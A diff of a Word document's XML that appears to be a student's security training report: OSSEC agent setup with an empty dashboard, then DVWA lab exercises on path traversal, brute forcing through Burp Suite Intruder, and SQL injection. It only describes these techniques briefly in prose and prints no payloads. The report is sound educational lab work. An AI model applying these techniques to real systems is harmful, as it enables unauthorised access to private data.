+            <wp:docPr id="29" name="Picture 29"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="3021330"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now we can go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId22" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>http://192.168.10.2/ossec-wui</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and see the dashboard for OSSEC.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">I will do something optional which is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">installing OSSEC in windows. I could add agent like I did for Ubuntu. Then I enter the windows name and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. I should get a key that is unique for windows. Install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ossec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and add the server </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and unique key in the interface. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F98646" wp14:editId="2EB63778">
+            <wp:extent cx="5685155" cy="3156585"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="31" name="Picture 31"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5685155" cy="3156585"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F191A7" wp14:editId="3592FC7B">
+            <wp:extent cx="5725160" cy="2647950"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="32" name="Picture 32"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="2647950"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The problem that I could not fix is that the OSSEC dashboard is empty. I spent hours trying to fix it and I looked for many websites, but nothing worked. However, I managed to make it work in the terminal only.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3CC6AD" wp14:editId="2E51DB73">
+            <wp:extent cx="5725160" cy="3546475"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="33" name="Picture 33"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 8"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="3546475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-AS"/>
         </w:rPr>
       </w:pPr>
@@ -4503,37 +5444,91 @@
           <w:lang w:val="en-AS"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc114154863"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-AS"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-AS"/>
-        </w:rPr>
-        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-AS"/>
-        </w:rPr>
-      </w:pPr>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc114154864"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+        </w:rPr>
+        <w:t>Path Traversal</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Moving to the real pen testing, we started the second week with a class for path traversal. It is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>when you study what is a specific system and then be able to know the file names and where sensitive data might be stored, you can navigate to the system files until you reach some private data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Also, you could get to trick the terminal that you are someone else and execute commands on behalf of them. </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4542,78 +5537,14 @@
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc113747829"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc114154865"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
-        <w:t>Path Traversal</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Moving to the real pen testing, we started the second week with a class for path traversal. It is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>when you study what is a specific system and then be able to know the file names and where sensitive data might be stored, you can navigate to the system files until you reach some private data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Also, you could get to trick the terminal that you are someone else and execute commands on behalf of them. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc113747830"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
         <w:t>Brute Force</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4662,7 +5593,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">sending the POST request to Burp Suite to adjust the inputs as I desire. Burp Suite has many methods that have several purposes. For instance, Intruder is to specify a payload that you want to try </w:t>
+        <w:t xml:space="preserve">sending the POST request to Burp Suite to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">adjust the inputs as I desire. Burp Suite has many methods that have several purposes. For instance, Intruder is to specify a payload that you want to try </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4857,7 +5797,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17" cstate="print">
+                    <a:blip r:embed="rId26" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4959,6 +5899,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="205062BA" wp14:editId="08A92745">
             <wp:extent cx="5725160" cy="3267710"/>
@@ -4977,7 +5918,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18">
+                    <a:blip r:embed="rId27">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5053,7 +5994,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19">
+                    <a:blip r:embed="rId28">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5176,7 +6117,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20">
+                    <a:blip r:embed="rId29">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5370,7 +6311,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21">
+                    <a:blip r:embed="rId30">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5445,7 +6386,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22">
+                    <a:blip r:embed="rId31">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5519,7 +6460,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23">
+                    <a:blip r:embed="rId32">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5576,14 +6517,14 @@
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc113747831"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc114154866"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
         <w:t>SQL injection</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5697,7 +6638,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24">
+                    <a:blip r:embed="rId33">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5787,7 +6728,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25">
+                    <a:blip r:embed="rId34">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5869,7 +6810,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26">
+                    <a:blip r:embed="rId35">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5989,7 +6930,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27">
+                    <a:blip r:embed="rId36">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6122,7 +7063,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28" cstate="print">
+                    <a:blip r:embed="rId37" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6170,6 +7111,463 @@
         </w:rPr>
         <w:t xml:space="preserve">As you can see it is </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>like</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the previous </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>one,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we only had to find a way to manipulate the POST request. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>SQLi – Online Challenges</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
